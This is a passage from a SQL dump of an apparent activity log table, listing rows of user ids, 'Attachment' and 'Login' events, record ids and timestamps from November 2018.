15:57:05',NULL),(9465,2,'Attachment',218,'2018-11-16 15:57:05','2018-11-16 15:57:05',NULL),(9466,2,'Attachment',252,'2018-11-16 15:57:05','2018-11-16 15:57:05',NULL),(9467,2,'Attachment',369,'2018-11-16 22:41:50','2018-11-16 22:41:50',NULL),(9468,2,'Attachment',371,'2018-11-16 22:41:51','2018-11-16 22:41:51',NULL),(9469,2,'Attachment',365,'2018-11-16 22:41:51','2018-11-16 22:41:51',NULL),(9470,2,'Attachment',382,'2018-11-16 22:41:51','2018-11-16 22:41:51',NULL),(9471,2,'Attachment',354,'2018-11-16 22:41:51','2018-11-16 22:41:51',NULL),(9472,2,'Attachment',363,'2018-11-16 22:41:51','2018-11-16 22:41:51',NULL),(9473,2,'Attachment',344,'2018-11-16 22:41:51','2018-11-16 22:41:51',NULL),(9474,2,'Attachment',335,'2018-11-16 22:41:51','2018-11-16 22:41:51',NULL),(9475,2,'Attachment',329,'2018-11-16 22:41:51','2018-11-16 22:41:51',NULL),(9476,2,'Attachment',293,'2018-11-17 00:05:17','2018-11-17 00:05:17',NULL),(9477,2,'Attachment',292,'2018-11-17 00:05:19','2018-11-17 00:05:19',NULL),(9478,2,'Attachment',329,'2018-11-17 00:37:40','2018-11-17 00:37:40',NULL),(9479,2,'Attachment',334,'2018-11-17 01:22:22','2018-11-17 01:22:22',NULL),(9480,2,'Attachment',296,'2018-11-17 01:22:30','2018-11-17 01:22:30',NULL),(9481,2,'Attachment',295,'2018-11-17 01:22:59','2018-11-17 01:22:59',NULL),(9482,2,'Attachment',382,'2018-11-17 05:19:45','2018-11-17 05:19:45',NULL),(9483,2,'Attachment',371,'2018-11-17 05:19:45','2018-11-17 05:19:45',NULL),(9484,2,'Attachment',365,'2018-11-17 05:19:45','2018-11-17 05:19:45',NULL),(9485,2,'Attachment',363,'2018-11-17 05:19:45','2018-11-17 05:19:45',NULL),(9486,2,'Attachment',354,'2018-11-17 05:19:45','2018-11-17 05:19:45',NULL),(9487,2,'Attachment',369,'2018-11-17 05:19:45','2018-11-17 05:19:45',NULL),(9488,2,'Attachment',344,'2018-11-17 05:19:45','2018-11-17 05:19:45',NULL),(9489,2,'Attachment',335,'2018-11-17 05:19:45','2018-11-17 05:19:45',NULL),(9490,2,'Attachment',329,'2018-11-17 05:19:46','2018-11-17 05:19:46',NULL),(9491,2,'Attachment',329,'2018-11-17 08:37:18','2018-11-17 08:37:18',NULL),(9492,2,'Attachment',369,'2018-11-17 09:35:19','2018-11-17 09:35:19',NULL),(9493,2,'Attachment',382,'2018-11-17 09:35:19','2018-11-17 09:35:19',NULL),(9494,2,'Attachment',371,'2018-11-17 09:35:19','2018-11-17 09:35:19',NULL),(9495,2,'Attachment',354,'2018-11-17 09:35:19','2018-11-17 09:35:19',NULL),(9496,2,'Attachment',365,'2018-11-17 09:35:19','2018-11-17 09:35:19',NULL),(9497,2,'Attachment',363,'2018-11-17 09:35:19','2018-11-17 09:35:19',NULL),(9498,2,'Attachment',344,'2018-11-17 09:35:20','2018-11-17 09:35:20',NULL),(9499,2,'Attachment',335,'2018-11-17 09:35:20','2018-11-17 09:35:20',NULL),(9500,2,'Attachment',329,'2018-11-17 09:35:20','2018-11-17 09:35:20',NULL),(9501,2,'Attachment',288,'2018-11-17 09:39:10','2018-11-17 09:39:10',NULL),(9502,2,'Attachment',266,'2018-11-17 09:39:10','2018-11-17 09:39:10',NULL),(9503,2,'Attachment',221,'2018-11-17 09:39:10','2018-11-17 09:39:10',NULL),(9504,2,'Attachment',252,'2018-11-17 09:39:10','2018-11-17 09:39:10',NULL),(9505,2,'Attachment',218,'2018-11-17 09:39:10','2018-11-17 09:39:10',NULL),(9506,2,'Attachment',181,'2018-11-17 09:39:11','2018-11-17 09:39:11',NULL),(9507,2,'Attachment',290,'2018-11-17 09:39:11','2018-11-17 09:39:11',NULL),(9508,2,'Attachment',180,'2018-11-17 09:39:11','2018-11-17 09:39:11',NULL),(9509,2,'Attachment',202,'2018-11-17 09:39:11','2018-11-17 09:39:11',NULL),(9510,2,'Attachment',294,'2018-11-17 09:39:11','2018-11-17 09:39:11',NULL),(9511,2,'Attachment',178,'2018-11-17 09:39:12','2018-11-17 09:39:12',NULL),(9512,2,'Attachment',174,'2018-11-17 09:39:12','2018-11-17 09:39:12',NULL),(9513,2,'Attachment',152,'2018-11-17 09:39:12','2018-11-17 09:39:12',NULL),(9514,2,'Attachment',369,'2018-11-17 15:31:47','2018-11-17 15:31:47',NULL),(9515,2,'Attachment',363,'2018-11-17 15:31:48','2018-11-17 15:31:48',NULL),(9516,2,'Attachment',382,'2018-11-17 15:31:48','2018-11-17 15:31:48',NULL),(9517,2,'Attachment',354,'2018-11-17 15:31:48','2018-11-17 15:31:48',NULL),(9518,2,'Attachment',365,'2018-11-17 15:31:48','2018-11-17 15:31:48',NULL),(9519,2,'Attachment',371,'2018-11-17 15:31:49','2018-11-17 15:31:49',NULL),(9520,2,'Attachment',344,'2018-11-17 15:31:49','2018-11-17 15:31:49',NULL),(9521,2,'Attachment',329,'2018-11-17 15:31:49','2018-11-17 15:31:49',NULL),(9522,2,'Attachment',335,'2018-11-17 15:31:51','2018-11-17 15:31:51',NULL),(9523,2,'Attachment',382,'2018-11-17 15:40:46','2018-11-17 15:40:46',NULL),(9524,2,'Attachment',371,'2018-11-17 15:40:46','2018-11-17 15:40:46',NULL),(9525,2,'Attachment',369,'2018-11-17 15:40:46','2018-11-17 15:40:46',NULL),(9526,2,'Attachment',365,'2018-11-17 15:40:46','2018-11-17 15:40:46',NULL),(9527,2,'Attachment',354,'2018-11-17 15:40:46','2018-11-17 15:40:46',NULL),(9528,2,'Attachment',363,'2018-11-17 15:40:46','2018-11-17 15:40:46',NULL),(9529,2,'Attachment',335,'2018-11-17 15:40:46','2018-11-17 15:40:46',NULL),(9530,2,'Attachment',344,'2018-11-17 15:40:46','2018-11-17 15:40:46',NULL),(9531,2,'Attachment',329,'2018-11-17 15:40:47','2018-11-17 15:40:47',NULL),(9532,2,'Attachment',344,'2018-11-17 16:32:02','2018-11-17 16:32:02',NULL),(9533,2,'Attachment',329,'2018-11-17 16:32:02','2018-11-17 16:32:02',NULL),(9534,2,'Attachment',369,'2018-11-17 16:46:13','2018-11-17 16:46:13',NULL),(9535,2,'Attachment',354,'2018-11-17 16:46:14','2018-11-17 16:46:14',NULL),(9536,2,'Attachment',371,'2018-11-17 16:46:14','2018-11-17 16:46:14',NULL),(9537,2,'Attachment',382,'2018-11-17 16:46:14','2018-11-17 16:46:14',NULL),(9538,2,'Attachment',365,'2018-11-17 16:46:14','2018-11-17 16:46:14',NULL),(9539,2,'Attachment',363,'2018-11-17 16:46:14','2018-11-17 16:46:14',NULL),(9540,2,'Attachment',329,'2018-11-17 16:46:14','2018-11-17 16:46:14',NULL),(9541,2,'Attachment',335,'2018-11-17 16:46:14','2018-11-17 16:46:14',NULL),(9542,2,'Attachment',344,'2018-11-17 16:46:14','2018-11-17 16:46:14',NULL),(9543,2,'Attachment',369,'2018-11-17 18:45:46','2018-11-17 18:45:46',NULL),(9544,2,'Attachment',382,'2018-11-17 18:45:48','2018-11-17 18:45:48',NULL),(9545,2,'Attachment',371,'2018-11-17 18:45:50','2018-11-17 18:45:50',NULL),(9546,2,'Attachment',354,'2018-11-17 18:45:50','2018-11-17 18:45:50',NULL),(9547,2,'Attachment',365,'2018-11-17 18:45:52','2018-11-17 18:45:52',NULL),(9548,2,'Attachment',363,'2018-11-17 18:45:53','2018-11-17 18:45:53',NULL),(9549,2,'Attachment',344,'2018-11-17 18:45:54','2018-11-17 18:45:54',NULL),(9550,2,'Attachment',335,'2018-11-17 18:45:56','2018-11-17 18:45:56',NULL),(9551,2,'Attachment',329,'2018-11-17 18:45:59','2018-11-17 18:45:59',NULL),(9552,2,'Attachment',369,'2018-11-18 00:55:57','2018-11-18 00:55:57',NULL),(9553,2,'Attachment',382,'2018-11-18 00:55:57','2018-11-18 00:55:57',NULL),(9554,2,'Attachment',354,'2018-11-18 00:55:57','2018-11-18 00:55:57',NULL),(9555,2,'Attachment',371,'2018-11-18 00:55:57','2018-11-18 00:55:57',NULL),(9556,2,'Attachment',365,'2018-11-18 00:55:57','2018-11-18 00:55:57',NULL),(9557,2,'Attachment',329,'2018-11-18 00:55:57','2018-11-18 00:55:57',NULL),(9558,2,'Attachment',363,'2018-11-18 00:55:57','2018-11-18 00:55:57',NULL),(9559,2,'Attachment',344,'2018-11-18 00:55:57','2018-11-18 00:55:57',NULL),(9560,2,'Attachment',335,'2018-11-18 00:55:58','2018-11-18 00:55:58',NULL),(9561,2,'Attachment',253,'2018-11-18 02:21:33','2018-11-18 02:21:33',NULL),(9562,2,'Attachment',254,'2018-11-18 02:21:33','2018-11-18 02:21:33',NULL),(9563,2,'Attachment',255,'2018-11-18 02:21:33','2018-11-18 02:21:33',NULL),(9564,2,'Attachment',256,'2018-11-18 02:21:34','2018-11-18 02:21:34',NULL),(9565,2,'Attachment',369,'2018-11-18 02:22:05','2018-11-18 02:22:05',NULL),(9566,2,'Attachment',382,'2018-11-18 02:22:05','2018-11-18 02:22:05',NULL),(9567,2,'Attachment',354,'2018-11-18 02:22:05','2018-11-18 02:22:05',NULL),(9568,2,'Attachment',371,'2018-11-18 02:22:05','2018-11-18 02:22:05',NULL),(9569,2,'Attachment',365,'2018-11-18 02:22:05','2018-11-18 02:22:05',NULL),(9570,2,'Attachment',363,'2018-11-18 02:22:05','2018-11-18 02:22:05',NULL),(9571,2,'Attachment',344,'2018-11-18 02:22:05','2018-11-18 02:22:05',NULL),(9572,2,'Attachment',329,'2018-11-18 02:22:05','2018-11-18 02:22:05',NULL),(9573,2,'Attachment',335,'2018-11-18 02:22:06','2018-11-18 02:22:06',NULL),(9574,2,'Attachment',344,'2018-11-18 08:37:50','2018-11-18 08:37:50',NULL),(9575,2,'Attachment',382,'2018-11-19 00:13:14','2018-11-19 00:13:14',NULL),(9576,2,'Attachment',369,'2018-11-19 00:13:14','2018-11-19 00:13:14',NULL),(9577,2,'Attachment',371,'2018-11-19 00:13:15','2018-11-19 00:13:15',NULL),(9578,2,'Attachment',354,'2018-11-19 00:13:15','2018-11-19 00:13:15',NULL),(9579,2,'Attachment',363,'2018-11-19 00:13:15','2018-11-19 00:13:15',NULL),(9580,2,'Attachment',344,'2018-11-19 00:13:15','2018-11-19 00:13:15',NULL),(9581,2,'Attachment',365,'2018-11-19 00:13:15','2018-11-19 00:13:15',NULL),(9582,2,'Attachment',335,'2018-11-19 00:13:15','2018-11-19 00:13:15',NULL),(9583,2,'Attachment',329,'2018-11-19 00:13:15','2018-11-19 00:13:15',NULL),(9584,2,'Attachment',369,'2018-11-19 01:32:32','2018-11-19 01:32:32',NULL),(9585,2,'Attachment',371,'2018-11-19 01:32:36','2018-11-19 01:32:36',NULL),(9586,2,'Attachment',382,'2018-11-19 01:32:36','2018-11-19 01:32:36',NULL),(9587,2,'Attachment',354,'2018-11-19 01:32:36','2018-11-19 01:32:36',NULL),(9588,2,'Attachment',365,'2018-11-19 01:32:36','2018-11-19 01:32:36',NULL),(9589,2,'Attachment',329,'2018-11-19 01:32:36','2018-11-19 01:32:36',NULL),(9590,2,'Attachment',363,'2018-11-19 01:32:37','2018-11-19 01:32:37',NULL),(9591,2,'Attachment',344,'2018-11-19 01:32:37','2018-11-19 01:32:37',NULL),(9592,2,'Attachment',335,'2018-11-19 01:32:37','2018-11-19 01:32:37',NULL),(9593,2,'Attachment',369,'2018-11-19 02:30:19','2018-11-19 02:30:19',NULL),(9594,2,'Attachment',382,'2018-11-19 02:30:23','2018-11-19 02:30:23',NULL),(9595,2,'Attachment',371,'2018-11-19 02:30:24','2018-11-19 02:30:24',NULL),(9596,2,'Attachment',354,'2018-11-19 02:30:25','2018-11-19 02:30:25',NULL),(9597,2,'Attachment',344,'2018-11-19 02:30:26','2018-11-19 02:30:26',NULL),(9598,2,'Attachment',363,'2018-11-19 02:30:26','2018-11-19 02:30:26',NULL),(9599,2,'Attachment',365,'2018-11-19 02:30:26','2018-11-19 02:30:26',NULL),(9600,2,'Attachment',335,'2018-11-19 02:30:26','2018-11-19 02:30:26',NULL),(9601,2,'Attachment',329,'2018-11-19 02:30:28','2018-11-19 02:30:28',NULL),(9602,2,'Attachment',369,'2018-11-19 09:51:06','2018-11-19 09:51:06',NULL),(9603,2,'Attachment',382,'2018-11-19 09:51:06','2018-11-19 09:51:06',NULL),(9604,2,'Attachment',371,'2018-11-19 09:51:06','2018-11-19 09:51:06',NULL),(9605,2,'Attachment',354,'2018-11-19 09:51:06','2018-11-19 09:51:06',NULL),(9606,2,'Attachment',329,'2018-11-19 09:51:07','2018-11-19 09:51:07',NULL),(9607,2,'Attachment',365,'2018-11-19 09:51:07','2018-11-19 09:51:07',NULL),(9608,2,'Attachment',363,'2018-11-19 09:51:08','2018-11-19 09:51:08',NULL),(9609,2,'Attachment',344,'2018-11-19 09:51:08','2018-11-19 09:51:08',NULL),(9610,2,'Attachment',335,'2018-11-19 09:51:08','2018-11-19 09:51:08',NULL),(9611,1,'Login',1,'2018-11-19 09:52:32','2018-11-19 09:52:32',NULL),(9612,1,'Attachment',371,'2018-11-19 09:52:44','2018-11-19 09:52:44',NULL),(9613,1,'Attachment',382,'2018-11-19 09:52:44','2018-11-19 09:52:44',NULL),(9614,1,'Attachment',354,'2018-11-19 09:52:44','2018-11-19 09:52:44',NULL),(9615,1,'Attachment',365,'2018-11-19 09:52:44','2018-11-19 09:52:44',NULL),(9616,1,'Attachment',383,'2018-11-19 10:01:15','2018-11-19 10:01:15',NULL),(9617,1,'Attachment',384,'2018-11-19 10:06:29','2018-11-19 10:06:29',NULL),(9618,1,'Attachment',341,'2018-11-19 10:06:39','2018-11-19 10:06:39',NULL),(9619,1,'Attachment',288,'2018-11-19 10:06:39','2018-11-19 10:06:39',NULL),(9620,1,'Attachment',266,'2018-11-19 10:06:39','2018-11-19 10:06:39',NULL),(9621,1,'Attachment',221,'2018-11-19 10:06:39','2018-11-19 10:06:39',NULL),(9622,1,'Attachment',218,'2018-11-19 10:06:39','2018-11-19 10:06:39',NULL),(9623,1,'Attachment',252,'2018-11-19 10:06:43','2018-11-19 10:06:43',NULL),(9624,1,'Attachment',202,'2018-11-19 10:06:43','2018-11-19 10:06:43',NULL),(9625,1,'Attachment',294,'2018-11-19 10:06:43','2018-11-19 10:06:43',NULL),(9626,1,'Attachment',290,'2018-11-19 10:06:44','2018-11-19 10:06:44',NULL),(9627,1,'Attachment',181,'2018-11-19 10:06:44','2018-11-19 10:06:44',NULL),(9628,1,'Attachment',180,'2018-11-19 10:06:44','2018-11-19 10:06:44',NULL),(9629,1,'Attachment',178,'2018-11-19 10:06:45','2018-11-19 10:06:45',NULL),(9630,1,'Attachment',174,'2018-11-19 10:06:45','2018-11-19 10:06:45',NULL),(9631,1,'Attachment',152,'2018-11-19 10:06:46','2018-11-19 10:06:46',NULL),(9632,1,'Attachment',105,'2018-11-19 10:06:46','2018-11-19 10:06:46',NULL),(9633,1,'Attachment',69,'2018-11-19 10:06:46','2018-11-19 10:06:46',NULL),(9634,1,'Attachment',57,'2018-11-19 10:06:46','2018-11-19 10:06:46',NULL),(9635,1,'Attachment',216,'2018-11-19 10:06:47','2018-11-19 10:06:47',NULL),(9636,1,'Attachment',38,'2018-11-19 10:06:47','2018-11-19 10:06:47',NULL),(9637,1,'Attachment',25,'2018-11-19 10:06:47','2018-11-19 10:06:47',NULL),(9638,1,'Attachment',14,'2018-11-19 10:06:47','2018-11-19 10:06:47',NULL),(9639,1,'Attachment',26,'2018-11-19 10:06:49','2018-11-19 10:06:49',NULL),(9640,1,'Attachment',15,'2018-11-19 10:06:49','2018-11-19 10:06:49',NULL),(9641,1,'Attachment',41,'2018-11-19 10:06:49','2018-11-19 10:06:49',NULL),(9642,1,'Attachment',27,'2018-11-19 10:06:49','2018-11-19 10:06:49',NULL),(9643,1,'Attachment',42,'2018-11-19 10:06:50','2018-11-19 10:06:50',NULL),(9644,1,'Attachment',43,'2018-11-19 10:06:50','2018-11-19 10:06:50',NULL),(9645,1,'Attachment',44,'2018-11-19 10:06:50','2018-11-19 10:06:50',NULL),(9646,1,'Attachment',45,'2018-11-19 10:06:50','2018-11-19 10:06:50',NULL),(9647,2,'Attachment',365,'2018-11-19 17:47:55','2018-11-19 17:47:55',NULL),(9648,2,'Attachment',371,'2018-11-19 17:47:55','2018-11-19 17:47:55',NULL),(9649,2,'Attachment',329,'2018-11-19 17:47:55','2018-11-19 17:47:55',NULL),(9650,2,'Attachment',354,'2018-11-19 17:47:55','2018-11-19 17:47:55',NULL),(9651,2,'Attachment',382,'2018-11-19 17:47:55','2018-11-19 17:47:55',NULL),(9652,2,'Attachment',369,'2018-11-19 17:47:55','2018-11-19 17:47:55',NULL),(9653,2,'Attachment',335,'2018-11-19 17:47:55','2018-11-19 17:47:55',NULL),(9654,2,'Attachment',363,'2018-11-19 17:47:55','2018-11-19 17:47:55',NULL),(9655,2,'Attachment',344,'2018-11-19 17:47:55','2018-11-19 17:47:55',NULL),(9656,2,'Attachment',295,'2018-11-20 22:57:27','2018-11-20 22:57:27',NULL),(9657,2,'Attachment',335,'2018-11-21 00:29:08','2018-11-21 00:29:08',NULL),(9658,2,'Attachment',225,'2018-11-21 00:48:58','2018-11-21 00:48:58',NULL),(9659,2,'Attachment',226,'2018-11-21 00:58:58','2018-11-21 00:58:58',NULL),(9660,2,'Attachment',382,'2018-11-21 01:59:26','2018-11-21 01:59:26',NULL),(9661,2,'Attachment',334,'2018-11-21 02:33:27','2018-11-21 02:33:27',NULL),(9662,2,'Attachment',228,'2018-11-21 02:39:40','2018-11-21 02:39:40',NULL),(9663,2,'Attachment',255,'2018-11-21 02:49:37','2018-11-21 02:49:37',NULL),(9664,2,'Attachment',283,'2018-11-21 02:59:55','2018-11-21 02:59:55',NULL),(9665,2,'Attachment',343,'2018-11-21 03:10:10','2018-11-21 03:10:10',NULL),(9666,2,'Attachment',357,'2018-11-21 03:30:19','2018-11-21 03:30:19',NULL),(9667,2,'Attachment',360,'2018-11-21 05:01:01','2018-11-21 05:01:01',NULL),(9668,2,'Attachment',380,'2018-11-21 05:26:28','2018-11-21 05:26:28',NULL),(9669,2,'Attachment',381,'2018-11-21 05:35:26','2018-11-21 05:35:26',NULL),(9670,2,'Attachment',295,'2018-11-21 08:14:23','2018-11-21 08:14:23',NULL),(9671,2,'Attachment',369,'2018-11-21 08:18:41','2018-11-21 08:18:41',NULL),(9672,2,'Attachment',382,'2018-11-21 08:18:42','2018-11-21 08:18:42',NULL),(9673,2,'Attachment',354,'2018-11-21 08:18:42','2018-11-21 08:18:42',NULL),(9674,2,'Attachment',371,'2018-11-21 08:18:42','2018-11-21 08:18:42',NULL),(9675,2,'Attachment',363,'2018-11-21 08:18:42','2018-11-21 08:18:42',NULL),(9676,2,'Attachment',365,'2018-11-21 08:18:42','2018-11-21 08:18:42',NULL),(9677,2,'Attachment',329,'2018-11-21 08:18:42','2018-11-21 08:18:42',NULL),(9678,2,'Attachment',344,'2018-11-21 08:18:42','2018-11-21 08:18:42',NULL),(9679,2,'Attachment',335,'2018-11-21 08:18:42','2018-11-21 08:18:42',NULL),(9680,2,'Attachment',334,'2018-11-21 11:17:03','2018-11-21 11:17:03',NULL),(9681,2,'Attachment',369,'2018-11-21 11:17:39','2018-11-21 11:17:39',NULL),(9682,2,'Attachment',340,'2018-11-21 14:05:39','2018-11-21 14:05:39',NULL),(9683,2,'Attachment',295,'2018-11-21 17:27:39','2018-11-21 17:27:39',NULL),(9684,2,'Attachment',338,'2018-11-21 18:53:40','2018-11-21 18:53:40',NULL),(9685,2,'Attachment',284,'2018-11-21 19:17:40','2018-11-21 19:17:40',NULL),(9686,2,'Attachment',230,'2018-11-21 19:41:40','2018-11-21 19:41:40',NULL),(9687,2,'Attachment',334,'2018-11-21 20:29:14','2018-11-21 20:29:14',NULL),(9688,2,'Attachment',256,'2018-11-21 20:53:39','2018-11-21 20:53:39',NULL),(9689,2,'Attachment',285,'2018-11-21 21:17:39','2018-11-21 21:17:39',NULL),(9690,2,'Attachment',352,'2018-11-21 21:41:39','2018-11-21 21:41:39',NULL),(9691,2,'Attachment',359,'2018-11-21 22:53:39','2018-11-21 22:53:39',NULL),(9692,2,'Attachment',370,'2018-11-21 23:17:39','2018-11-21 23:17:39',NULL),(9693,2,'Attachment',364,'2018-11-21 23:41:39','2018-11-21 23:41:39',NULL),(9694,2,'Attachment',377,'2018-11-22 00:29:39','2018-11-22 00:29:39',NULL),(9695,2,'Attachment',371,'2018-11-22 00:47:31','2018-11-22 00:47:31',NULL),(9696,2,'Attachment',369,'2018-11-22 00:47:31','2018-11-22 00:47:31',NULL),(9697,2,'Attachment',382,'2018-11-22 00:47:31','2018-11-22 00:47:31',NULL),(9698,2,'Attachment',354,'2018-11-22 00:47:31','2018-11-22 00:47:31',NULL),(9699,2,'Attachment',365,'2018-11-22 00:47:31','2018-11-22 00:47:31',NULL),(9700,2,'Attachment',363,'2018-11-22 00:47:31','2018-11-22 00:47:31',NULL),(9701,2,'Attachment',329,'2018-11-22 00:47:31','2018-11-22 00:47:31',NULL),(9702,2,'Attachment',344,'2018-11-22 00:47:31','2018-11-22 00:47:31',NULL),(9703,2,'Attachment',335,'2018-11-22 00:47:31','2018-11-22 00:47:31',NULL),(9704,2,'Attachment',378,'2018-11-22 01:17:39','2018-11-22 01:17:39',NULL),(9705,2,'Attachment',295,'2018-11-22 02:10:41','2018-11-22 02:10:41',NULL),(9706,2,'Attachment',366,'2018-11-22 03:41:39','2018-11-22 03:41:39',NULL),(9707,2,'Attachment',106,'2018-11-22 04:29:39','2018-11-22 04:29:39',NULL),(9708,2,'Attachment',353,'2018-11-22 04:55:10','2018-11-22 04:55:10',NULL),(9709,2,'Attachment',361,'2018-11-22 05:53:39','2018-11-22 05:53:39',NULL),(9710,2,'Attachment',229,'2018-11-22 06:41:42','2018-11-22 06:41:42',NULL),(9711,2,'Attachment',355,'2018-11-22 08:17:39','2018-11-22 08:17:39',NULL),(9712,2,'Attachment',369,'2018-11-22 08:58:34','2018-11-22 08:58:34',NULL),(9713,2,'Attachment',354,'2018-11-22 08:58:34','2018-11-22 08:58:34',NULL),(9714,2,'Attachment',365,'2018-11-22 08:58:34','2018-11-22 08:58:34',NULL),(9715,2,'Attachment',371,'2018-11-22 08:58:34','2018-11-22 08:58:34',NULL),(9716,2,'Attachment',382,'2018-11-22 08:58:34','2018-11-22 08:58:34',NULL),(9717,2,'Attachment',363,'2018-11-22 08:58:34','2018-11-22 08:58:34',NULL),(9718,2,'Attachment',384,'2018-11-22 08:58:34','2018-11-22 08:58:34',NULL),(9719,2,'Attachment',344,'2018-11-22 08:58:34','2018-11-22 08:58:34',NULL),(9720,2,'Attachment',369,'2018-11-22 08:59:10','2018-11-22 08:59:10',NULL),(9721,2,'Attachment',371,'2018-11-22 08:59:11','2018-11-22 08:59:11',NULL),(9722,2,'Attachment',382,'2018-11-22 08:59:11','2018-11-22 08:59:11',NULL),(9723,2,'Attachment',354,'2018-11-22 08:59:11','2018-11-22 08:59:11',NULL),(9724,2,'Attachment',365,'2018-11-22 08:59:11','2018-11-22 08:59:11',NULL),(9725,2,'Attachment',363,'2018-11-22 08:59:11','2018-11-22 08:59:11',NULL),(9726,2,'Attachment',344,'2018-11-22 08:59:11','2018-11-22 08:59:11',NULL),(9727,2,'Attachment',384,'2018-11-22 08:59:11','2018-11-22 08:59:11',NULL),(9728,2,'Attachment',341,'2018-11-22 08:59:14','2018-11-22 08:59:14',NULL),(9729,2,'Attachment',335,'2018-11-22 08:59:14','2018-11-22 08:59:14',NULL),(9730,2,'Attachment',266,'2018-11-22 08:59:14','2018-11-22 08:59:14',NULL),(9731,2,'Attachment',218,'2018-11-22 08:59:14','2018-11-22 08:59:14',NULL),(9732,2,'Attachment',288,'2018-11-22 08:59:14','2018-11-22 08:59:14',NULL),(9733,2,'Attachment',221,'2018-11-22 08:59:14','2018-11-22 08:59:14',NULL),(9734,2,'Attachment',369,'2018-11-22 08:59:57','2018-11-22 08:59:57',NULL),(9735,2,'Attachment',371,'2018-11-22 08:59:57','2018-11-22 08:59:57',NULL),(9736,2,'Attachment',382,'2018-11-22 08:59:57','2018-11-22 08:59:57',NULL),(9737,2,'Attachment',354,'2018-11-22 08:59:57','2018-11-22 08:59:57',NULL),(9738,2,'Attachment',384,'2018-11-22 08:59:58','2018-11-22 08:59:58',NULL),(9739,2,'Attachment',365,'2018-11-22 08:59:58','2018-11-22 08:59:58',NULL),(9740,2,'Attachment',363,'2018-11-22 08:59:58','2018-11-22 08:59:58',NULL),(9741,2,'Attachment',344,'2018-11-22 08:59:59','2018-11-22 08:59:59',NULL),(9742,2,'Attachment',382,'2018-11-22 09:04:36','2018-11-22 09:04:36',NULL),(9743,2,'Attachment',354,'2018-11-22 09:04:36','2018-11-22 09:04:36',NULL),(9744,2,'Attachment',369,'2018-11-22 09:04:36','2018-11-22 09:04:36',NULL),(9745,2,'Attachment',371,'2018-11-22 09:04:36','2018-11-22 09:04:36',NULL),(9746,2,'Attachment',369,'2018-11-22 09:04:47','2018-11-22 09:04:47',NULL),(9747,2,'Attachment',382,'2018-11-22 09:04:47','2018-11-22 09:04:47',NULL),(9748,2,'Attachment',371,'2018-11-22 09:04:48','2018-11-22 09:04:48',NULL),(9749,2,'Attachment',354,'2018-11-22 09:04:48','2018-11-22 09:04:48',NULL),(9750,2,'Attachment',365,'2018-11-22 09:04:48','2018-11-22 09:04:48',NULL),(9751,2,'Attachment',363,'2018-11-22 09:04:50','2018-11-22 09:04:50',NULL),(9752,2,'Attachment',344,'2018-11-22 09:04:50','2018-11-22 09:04:50',NULL),(9753,2,'Attachment',384,'2018-11-22 09:04:51','2018-11-22 09:04:51',NULL),(9754,2,'Attachment',369,'2018-11-22 10:01:57','2018-11-22 10:01:57',NULL),(9755,2,'Attachment',382,'2018-11-22 10:01:57','2018-11-22 10:01:57',NULL),(9756,2,'Attachment',354,'2018-11-22 10:01:57','2018-11-22 10:01:57',NULL),(9757,2,'Attachment',371,'2018-11-22 10:01:57','2018-11-22 10:01:57',NULL),(9758,2,'Attachment',365,'2018-11-22 10:01:57','2018-11-22 10:01:57',NULL),(9759,2,'Attachment',363,'2018-11-22 10:01:57','2018-11-22 10:01:57',NULL),(9760,2,'Attachment',384,'2018-11-22 10:01:57','2018-11-22 10:01:57',NULL),(9761,2,'Attachment',344,'2018-11-22 10:01:57','2018-11-22 10:01:57',NULL),(9762,2,'Attachment',383,'2018-11-22 10:03:08','2018-11-22 10:03:08',NULL),(9763,2,'Attachment',315,'2018-11-22 10:04:12','2018-11-22 10:04:12',NULL),(9764,2,'Attachment',314,'2018-11-22 10:04:12','2018-11-22 10:04:12',NULL),(9765,2,'Attachment',322,'2018-11-22 10:04:12','2018-11-22 10:04:12',NULL),(9766,2,'Attachment',327,'2018-11-22 10:04:12','2018-11-22 10:04:12',NULL),(9767,2,'Attachment',321,'2018-11-22 10:04:12','2018-11-22 10:04:12',NULL),(9768,2,'Attachment',323,'2018-11-22 10:04:12','2018-11-22 10:04:12',NULL),(9769,2,'Attachment',320,'2018-11-22 10:04:14','2018-11-22 10:04:14',NULL),(9770,2,'Attachment',341,'2018-11-22 10:04:22','2018-11-22 10:04:22',NULL),(9771,2,'Attachment',266,'2018-11-22 10:04:23','2018-11-22 10:04:23',NULL),(9772,2,'Attachment',152,'2018-11-22 10:04:23','2018-11-22 10:04:23',NULL),(9773,2,'Attachment',252,'2018-11-22 10:04:23','2018-11-22 10:04:23',NULL),(9774,2,'Attachment',288,'2018-11-22 10:04:32','2018-11-22 10:04:32',NULL),(9775,2,'Attachment',57,'2018-11-22 10:04:32','2018-11-22 10:04:32',NULL),(9776,2,'Attachment',181,'2018-11-22 10:04:32','2018-11-22 10:04:32',NULL),(9777,2,'Attachment',28,'2018-11-22 10:04:32','2018-11-22 10:04:32',NULL),(9778,2,'Attachment',49,'2018-11-22 10:04:33','2018-11-22 10:04:33',NULL),(9779,2,'Attachment',294,'2018-11-22 10:04:33','2018-11-22 10:04:33',NULL),(9780,2,'Attachment',335,'2018-11-22 10:04:33','2018-11-22 10:04:33',NULL),(9781,2,'Attachment',290,'2018-11-22 10:04:33','2018-11-22 10:04:33',NULL),(9782,2,'Attachment',50,'2018-11-22 10:04:33','2018-11-22 10:04:33',NULL),(9783,2,'Attachment',280,'2018-11-22 10:04:33','2018-11-22 10:04:33',NULL),(9784,2,'Attachment',274,'2018-11-22 10:04:33','2018-11-22 10:04:33',NULL),(9785,2,'Attachment',41,'2018-11-22 10:04:35','2018-11-22 10:04:35',NULL),(9786,2,'Attachment',42,'2018-11-22 10:04:35','2018-11-22 10:04:35',NULL),(9787,2,'Attachment',43,'2018-11-22 10:04:36','2018-11-22 10:04:36',NULL),(9788,2,'Attachment',221,'2018-11-22 10:04:42','2018-11-22 10:04:42',NULL),(9789,2,'Attachment',218,'2018-11-22 10:04:42','2018-11-22 10:04:42',NULL),(9790,2,'Attachment',384,'2018-11-22 10:31:19','2018-11-22 10:31:19',NULL),(9791,2,'Attachment',356,'2018-11-22 13:17:39','2018-11-22 13:17:39',NULL),(9792,2,'Attachment',253,'2018-11-22 13:29:39','2018-11-22 13:29:39',NULL),(9793,2,'Attachment',363,'2018-11-22 14:08:27','2018-11-22 14:08:27',NULL),(9794,2,'Attachment',371,'2018-11-22 14:08:27','2018-11-22 14:08:27',NULL),(9795,2,'Attachment',369,'2018-11-22 14:08:27','2018-11-22 14:08:27',NULL),(9796,2,'Attachment',382,'2018-11-22 14:08:27','2018-11-22 14:08:27',NULL),(9797,2,'Attachment',354,'2018-11-22 14:08:27','2018-11-22 